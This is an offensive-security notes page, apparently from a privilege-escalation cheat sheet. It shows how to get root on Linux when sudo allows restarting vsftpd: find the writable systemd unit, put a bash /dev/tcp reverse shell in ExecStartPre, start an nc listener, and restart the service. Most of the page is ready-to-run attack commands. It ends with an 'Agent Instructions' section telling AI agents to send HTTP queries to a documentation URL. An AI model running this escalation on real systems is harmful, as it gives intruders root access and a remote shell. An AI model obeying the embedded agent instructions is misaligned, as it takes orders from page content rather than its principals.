# Sudo Service Privilege Escalation

### [Investigation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-service-privilege-escalation/#investigation) <a href="#investigation" id="investigation"></a>

```sh
sudo -l

(ALL : ALL) /usr/sbin/service vsftpd restart
Copied!
```

If we can execute **service** command as root, we may be able to escalate to root privilege.

<br>

### [Exploitation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-service-privilege-escalation/#exploitation) <a href="#exploitation" id="exploitation"></a>

#### [1. Find the Location of the Config File](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-service-privilege-escalation/#1.-find-the-location-of-the-config-file) <a href="#id-1.-find-the-location-of-the-config-file" id="id-1.-find-the-location-of-the-config-file"></a>

Assume we can operate the **vsftpd** service as root. Firse off, find the service config file for vsftpd.

```sh
find / -name "*vsftpd*"
Copied!
```

For instance, we'll find the location as below.

```sh
/lib/systemd/system/vsftpd.service
/etc/systemd/system/multi-user.target.wants/vsftpd.service
Copied!
```

When getting the locations, the next thing to do is to check the permission. If we have a write permission for the above each files, we can update the execution when vsftpd started.

#### [2. Update the Config File](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-service-privilege-escalation/#2.-update-the-config-file) <a href="#id-2.-update-the-config-file" id="id-2.-update-the-config-file"></a>

Insert the payload for reverse shell to the value of the **“ExecStartPre”**. Doing this, we can get a shell from our listener when the FTP daemon restarted.

```sh
[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target
Copied!
```

Then we need to reload the daemon.

```sh
systemctl daemon-reload
Copied!
```

#### [3. Execution](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-service-privilege-escalation/#3.-execution) <a href="#id-3.-execution" id="id-3.-execution"></a>

In local machine, start listener for getting a shell.

```sh
nc -lvnp 4444
Copied!
```

Now execute the command which can be executed with sudo.

```sh
sudo /usr/sbin/service vsftpd restart
Copied!
```

We should get a shell as root user.

<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/sudo-service-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.